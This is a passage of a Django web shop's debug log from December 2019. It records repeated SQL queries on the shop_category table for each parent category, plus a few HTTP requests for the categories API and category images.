"shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-27 06:45:15,392 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-27 06:45:15,394 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-27 06:45:15,397 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-27 06:45:15,400 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-27 06:45:15,402 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-27 06:45:15,405 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-27 06:45:15,407 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [27/Dec/2019 06:45:15] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-27 06:45:15,958 utils 4252 140031503103744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-27 06:45:15,969 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-27 06:45:15,975 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-27 06:45:15,978 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-27 06:45:15,984 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-27 06:45:15,990 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-27 06:45:15,995 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-27 06:45:15,999 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-27 06:45:16,003 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-27 06:45:16,009 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-27 06:45:16,013 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-27 06:45:16,017 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-27 06:45:16,020 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-27 06:45:16,025 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-27 06:45:16,031 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-27 06:45:16,039 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-27 06:45:16,044 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) [27/Dec/2019 06:45:16] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 304 0 DEBUG 2019-12-27 06:45:16,049 utils 4252 140031503103744 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-27 06:45:16,053 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-27 06:45:16,059 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-27 06:45:16,063 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-27 06:45:16,067 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-27 06:45:16,072 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-27 06:45:16,079 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-27 06:45:16,084 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) [27/Dec/2019 06:45:16] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 304 0 DEBUG 2019-12-27 06:45:16,090 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-27 06:45:16,094 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-27 06:45:16,098 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-27 06:45:16,102 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-27 06:45:16,106 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-27 06:45:16,112 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-27 06:45:16,116 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-27 06:45:16,120 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-27 06:45:16,124 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-27 06:45:16,128 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-27 06:45:16,135 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-27 06:45:16,139 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-27 06:45:16,142 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-27 06:45:16,147 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-27 06:45:16,151 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-27 06:45:16,154 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-27 06:45:16,159 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-27 06:45:16,163 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-27 06:45:16,167 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-27 06:45:16,172 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-27 06:45:16,176 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [27/Dec/2019 06:45:16] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-27 06:45:18,115 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-27 06:45:18,126 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-27 06:45:18,131 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-27 06:45:18,135 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-27 06:45:18,140 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-27 06:45:18,142 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-27 06:45:18,145 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-27 06:45:18,148 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-27 06:45:18,150 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-27 06:45:18,154 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-27 06:45:18,156 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-27 06:45:18,158 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-27 06:45:18,160 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-27 06:45:18,163 utils 4252 140031503103744 (0.000) 